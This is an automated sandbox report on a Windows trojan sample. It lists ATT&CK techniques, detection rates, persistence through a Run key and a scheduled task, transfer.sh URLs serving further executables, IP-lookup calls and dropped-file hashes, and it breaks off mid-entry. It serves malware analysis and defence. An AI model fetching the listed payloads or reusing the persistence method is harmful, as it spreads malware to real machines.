Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Scheduled Task/Job (1); PowerShell (1); At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
Persistence: Scheduled Task/Job (1); Registry Run Keys / Startup Folder (1); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (11); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (1); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (41); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Compile After Delivery; Indicator Removal from Tools
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: Security Software Discovery (131); Process Discovery (1); Virtualization/Sandbox Evasion (41); Application Window Discovery (11); Remote System Discovery (1); System Network Configuration Discovery (1); File and Directory Discovery (1); System Information Discovery (12)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (3); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue
Behavior Graph ID: 865491, Sample: SecuriteInfo.com.Win64.Troj..., Startdate: 14/05/2023, Architecture: WINDOWS, Score: 80

Source | Detection | Scanner | Label
SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe | 24% | ReversingLabs | Win64.Trojan.Amadey
SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe | 26% | Virustotal |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\MonDisc.exe | 100% | Avira | HEUR/AGEN.1315574
C:\Users\user\AppData\Roaming\Prtct\Updates\SysCare\LoWin64.exe | 100% | Avira | HEUR/AGEN.1315574
C:\Users\user\AppData\Roaming\MonDisc.exe | 54% | ReversingLabs | Win64.Trojan.Lazy
C:\Users\user\AppData\Roaming\MonDisc.exe | 56% | Virustotal |
C:\Users\user\AppData\Roaming\Prtct\Updates\SysCare\LoWin64.exe | 49% | ReversingLabs | Win64.Trojan.Lazy
C:\Users\user\AppData\Roaming\Prtct\Updates\SysCare\LoWin64.exe | 54% | Virustotal |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://crl.m | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://oneget.orgX | 0% | URL Reputation | safe
https://oneget.orgformat.ps1xmlagement.dll2040.missionsand | 0% | URL Reputation | safe
https://oneget.org | 0% | URL Reputation | safe
http://crl.micr0qv | 0% | Avira URL Cloud | safe

Name | IP | Active | Malicious | Antivirus Detection | Reputation
ip-api.com | 208.95.112.1 | true | false | | high
transfer.sh | 144.76.136.153 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://transfer.sh/get/1PRjTr/clip.exe | false | | high
https://transfer.sh/get/1h9hjM/LoWin64.exe | false | | high
http://ip-api.com/json/?fields=query,status,countryCode,city,timezone | false | | high
https://transfer.sh/get/1PRjTr/clip.exe | false | | high
http://transfer.sh/get/1h9hjM/LoWin64.exe | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 0000000A.00000002.407751595.00000280901AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.335874008.000002808158D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.407751595.0000028090078000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 0000000A.00000002.335874008.0000028080EE3000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.m | powershell.exe, 0000000A.00000002.413976982.00000280F3135000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000A.00000002.335874008.00000280813B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.420208424.00000280F5034000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000A.00000002.335874008.00000280813B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.420208424.00000280F5034000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 0000000A.00000002.407751595.0000028090078000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 0000000A.00000002.407751595.00000280901AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.335874008.000002808158D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.407751595.0000028090078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.335874008.000002808028D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 0000000A.00000002.407751595.0000028090078000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000000A.00000002.407751595.0000028090078000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://oneget.orgX | powershell.exe, 0000000A.00000002.335874008.0000028080EE3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.micr0qv | powershell.exe, 0000000A.00000002.413976982.00000280F3135000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://oneget.orgformat.ps1xmlagement.dll2040.missionsand | powershell.exe, 0000000A.00000002.335874008.0000028080EE3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 0000000A.00000002.335874008.0000028080001000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 0000000A.00000002.335874008.00000280813B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.420208424.00000280F5034000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://oneget.org | powershell.exe, 0000000A.00000002.335874008.0000028080EE3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown

IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
144.76.136.153 | transfer.sh | Germany | 24940 | HETZNER-ASDE | false
185.159.130.81 | unknown | Russian Federation | 64439 | ITOS-ASRU | false
185.149.146.118 | unknown | Russian Federation | 42861 | FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU | false
185.159.129.168 | unknown | Russian Federation | 64439 | ITOS-ASRU | false

IP
192.168.2.1

Joe Sandbox Version: 37.1.0 Beryl
Analysis ID: 865491
Start date and time: 2023-05-14 04:48:30 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 38s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 40
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
Detection: MAL
Classification: mal80.troj.evad.winEXE@31/21@4/6
EGA Information:
  • Successful, ratio: 40%
HDC Information:
  • Successful, ratio: 60.5% (good quality ratio 52.1%)
  • Quality average: 62%
  • Quality standard deviation: 34.3%
HCA Information:
  • Successful, ratio: 71%
  • Number of executed functions: 93
  • Number of non-executed functions: 43
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, consent.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 23.36.225.122
  • Excluded domains from analysis (whitelisted): www.bing.com, www.microsoft.com-c-3.edgekey.net, fs.microsoft.com, e13678.dscb.akamaiedge.net, ctldl.windowsupdate.com, www.microsoft.com, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
  • Execution Graph export aborted for target powershell.exe, PID 1840 because it is empty
  • Execution Graph export aborted for target powershell.exe, PID 2820 because it is empty
  • Execution Graph export aborted for target powershell.exe, PID 5032 because it is empty
  • Not all processes where analyzed, report is missing behavior information
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.

Time | Type | Description
04:51:01 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MonDisc "C:\Users\user\AppData\Roaming\MonDisc.exe"
04:51:05 | Task Scheduler | Run new task: MonDisc path: C:\Users\user\AppData\Roaming\MonDisc.exe
04:51:11 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MonDisc "C:\Users\user\AppData\Roaming\MonDisc.exe"

Match: 208.95.112.1
Associated Sample Name / URL | Detection | Threat Name | Context
HelloKittyCafe.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
SrfFpGhGIc.exe | malicious | VjW0rm, WSHRAT | ip-api.com/json/
LOIC.exe | malicious | Unknown | ip-api.com/line/?fields=hosting
PeterBot.exe | malicious | Unknown | ip-api.com/line/?fields=hosting
persistenceModule.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
qsteemp.exe | malicious | Gurcu Stealer | ip-api.com/line?fields=query,country
Qukp.exe | malicious | RedLine | ip-api.com/line/?fields=hosting
Y9IlbIEYjk.exe | malicious | VjW0rm, WSHRAT | ip-api.com/json/
RA2.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
sourcecode.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
Spotify.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
XBinderOutputBREAD.exe | malicious | Unknown | ip-api.com/line/?fields=hosting
XClient.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
xw.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
4XFf8KBC6s.exe | malicious | Nymaim, RedLine, SmokeLoader, onlyLogger | ip-api.com/json/
file.exe | malicious | BlackGuard | ip-api.com/json/
PO_20091827994.js | malicious | WSHRAT | ip-api.com/json/
JFBYfxYeTO.exe | malicious | BlackGuard | ip-api.com/json/
JHtrZ0tgun.exe | malicious | BlackGuard | ip-api.com/json/

Match: ip-api.com
Associated Sample Name / URL | Detection | Threat Name | Context
HelloKittyCafe.exe | malicious | XWorm | 208.95.112.1
SrfFpGhGIc.exe | malicious | VjW0rm, WSHRAT | 208.95.112.1
LOIC.exe | malicious | Unknown | 208.95.112.1
PeterBot.exe | malicious | Unknown | 208.95.112.1
persistenceModule.exe | malicious | XWorm | 208.95.112.1
qsteemp.exe | malicious | Gurcu Stealer | 208.95.112.1
Qukp.exe | malicious | RedLine | 208.95.112.1
Y9IlbIEYjk.exe | malicious | VjW0rm, WSHRAT | 208.95.112.1
RA2.exe | malicious | XWorm | 208.95.112.1
sourcecode.exe | malicious | XWorm | 208.95.112.1
Spotify.exe | malicious | XWorm | 208.95.112.1
XBinderOutputBREAD.exe | malicious | Unknown | 208.95.112.1
XClient.exe | malicious | XWorm | 208.95.112.1
xw.exe | malicious | XWorm | 208.95.112.1
build4.exe | malicious | Gurcu Stealer | 208.95.112.1
zCXfw71997.exe | malicious | Unknown | 208.95.112.1
4XFf8KBC6s.exe | malicious | Nymaim, RedLine, SmokeLoader, onlyLogger | 208.95.112.1
file.exe | malicious | BlackGuard | 208.95.112.1
PO_20091827994.js | malicious | WSHRAT | 208.95.112.1
                            No context
                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            File Type:HTML document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):169
                            Entropy (8bit):4.51833957423091
                            Encrypted:false
                            SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLPfLRIwcWWGu:q43tISl6kXiMIWSU6XlI5LPtIpfGu
                            MD5:84855C13836B389D5EC7CFD4C9266173
                            SHA1:1CF3056FF23C4176FD7CA9816A000ED461D6D323
                            SHA-256:502083C916AE481CDD413B8D93315300653DF5FB3DCC5770C01991DE19977EAE
                            SHA-512:2479112004884D42D4FFE1174DC358C5D1B0FA2B41641D32F2FB67539C4F834D63CFBBF7E98C63B9A64E49B26390C410BB7E50F1AD4A755F32D081367AF05FCB
                            Malicious:false
                            Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx/1.18.0</center>..</body>..</html>..
                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):110
                            Entropy (8bit):4.6071979068611295
                            Encrypted:false
                            SSDEEP:3:YWR4buWsyLBHm+CUAyROfQ8I5CMt6MXLUMgRnY:YWybuiTuOjbUMgRnY
                            MD5:AD4FCD343503CD318D7A6D7032086BC6
                            SHA1:1AC93BB281E3AE8FDC9E76538E2FCAA4382B3FAF
                            SHA-256:F94BB36FFAF71338729A3491BEAC8423FBA77B93E78077B14029865B5EECA77F
                            SHA-512:D16281CB078AEE462F92A44B0C7FB341804A72210F803D81F018BA91D2BB5AABEDF74F8D5E83D2E02BA51DD83DC1FEF455D351C5EA5A87B818DE24F48D17FB24
                            Malicious:false
                            Preview:{"status":"success","countryCode":"CH","city":"Hunenberg","timezone":"Europe/Zurich","query":"102.129.143.47"}
                            Process:C:\Users\user\AppData\Roaming\MonDisc.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):110
                            Entropy (8bit):4.6071979068611295
                            Encrypted:false
                            SSDEEP:3:YWR4buWsyLBHm+CUAyROfQ8I5CMt6MXLUMgRnY:YWybuiTuOjbUMgRnY
                            MD5:AD4FCD343503CD318D7A6D7032086BC6
                            SHA1:1AC93BB281E3AE8FDC9E76538E2FCAA4382B3FAF
                            SHA-256:F94BB36FFAF71338729A3491BEAC8423FBA77B93E78077B14029865B5EECA77F
                            SHA-512:D16281CB078AEE462F92A44B0C7FB341804A72210F803D81F018BA91D2BB5AABEDF74F8D5E83D2E02BA51DD83DC1FEF455D351C5EA5A87B818DE24F48D17FB24
                            Malicious:false
                            Preview:{"status":"success","countryCode":"CH","city":"Hunenberg","timezone":"Europe/Zurich","query":"102.129.143.47"}
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):18817
                            Entropy (8bit):5.001217266823362
                            Encrypted:false
                            SSDEEP:384:ufib4GGVoGIpN6KQkj2Akjh4iUxGzCdaOdB/NXp5CvOjJEYoV4fib41:uIGV3IpNBQkj25h4iUxGzCdaOdB/NZwY
                            MD5:DB93B232EFF0785FDDC28A0D5DAE38D2
                            SHA1:AF5AFE47557C49F165F66B2B63962D9EB28E3157
                            SHA-256:92939214003421B64153B215D15F89595673C709110FC6E005FF955F6684C390
                            SHA-512:5D161CFEE2631553AC2FA8EE407FE4CBA23C9A666BB69049C0FCCBEE99413983C678E4779426532FB4F5E622155C9EFF8DA57CD93AE4453D57301B32C19CBAA9
                            Malicious:false
                            Preview:PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):64
                            Entropy (8bit):0.34726597513537405
                            Encrypted:false
                            SSDEEP:3:Nlll:Nll
                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                            Malicious:false
                            Preview:@...e...........................................................
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview:1
                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):1619428
                            Entropy (8bit):7.59374824680465
                            Encrypted:false
                            SSDEEP:24576:OWXJJ2t8UZmjAOXwfp8UkSOOyYZtHVyNZQQSFMIND0Kw8qwKGybJZFcwV/Ubf16m:xrcO6uctHVQbIh0Kw87KGoP2wxyV
                            MD5:EEF2E49FD27D42237FFB929E1A39FC2D
                            SHA1:590C0FAFBBE555A8E4C8A7DDB8BD869E7813A1E1
                            SHA-256:B25CF13A5F670BE96946523C31C4FD84F639F397B5AB6D4BD244848CF160BB37
                            SHA-512:4C559EF66F7A62481C708A40D746F84A3B3EBC4B4E7B7B23997493B193EE7954AF4A1C431509EF352D336270976732C55FA105579A37D7B299DF963EE56A1BBE
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 54%
                            • Antivirus: Virustotal, Detection: 56%, Browse
                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........D.........................8.................................................2......2......2.U.......=.....2......Rich....................PE..d...#.Vd..........".................vZ.........@.............................00...........`...........................................-.(...a.,.(.....0.......,.@.............0.....E.-.......................,.(....................................................text...:.,......................... ..`.data.... ....,.. ..................@....vxlang.......,.....................@..@.mir..........-........................`.rsrc.........0.....................@..@.reloc........0.....................@..@................................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):1628132
                            Entropy (8bit):7.604723957432385
                            Encrypted:false
                            SSDEEP:24576:DN6DSMx5qk/2h75CFLcCbHgDs1WYorUwevCG0WlKeGJpyP:DN6Cm2CFLPbHksgV1GMaP
                            MD5:79F329EA2EC0C1BAED4F262F79B48BA5
                            SHA1:12068E22E536A9848B24CC3974F250DD015E2F9C
